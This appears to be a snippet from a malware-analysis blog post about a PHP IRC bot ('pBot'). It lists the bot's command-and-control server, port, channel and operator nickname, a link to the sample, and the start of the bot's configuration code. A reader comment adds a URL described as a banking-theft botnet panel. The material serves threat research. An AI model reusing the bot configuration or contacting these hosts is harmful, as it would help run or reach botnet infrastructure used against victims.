Sample obtained from http://www.malekal.com/2013/11/09/attaque-web-bitcoin-et-php-shell/
Resolved ircd.port0.org to 89.188.108.30
Server: ircd.port0.org
Port: 3303
There are 1 users and 3897 invisible on 1 servers 1 :operator(s) online 157 :unknown connection(s) 7 :channels formed I have 3898 clients and 0 servers 3898 4515 :Current local users 3898, max 4515
Channel: #q
Channel Users Topic #q 602 [+smu]
Oper:
[Geox] (Geox@localhost): [Pam Pam] [Geox] @#q [Geox] safe.ircd.com :The Server [Geox] is a Network Administrator [Geox] is available for help. [Geox] idle 11:33:42, signon: Fri Nov 08 03:02:07 [Geox] End of WHOIS list.
Hosting infos: http://whois.domaintools.com/89.188.108.30
Sample: http://pjjoint.malekal.com/files.php?read=20131109_r5x6n9m8q12
class pBot { var $config = array("server"=>"ircd.port0.org", "port"=>"3303", "key"=>"*", "prefix"=>"Geox", "maxrand"=>"8", "chan"=>"#q", "trigger"=>".", "hostauth"=>"localhost"); var $users = array(); function start()
Vikash Umar - November 18, 2013 at 9:21 pm
a solar botnet for banking data theft http://acstyles.com/images/panel/?login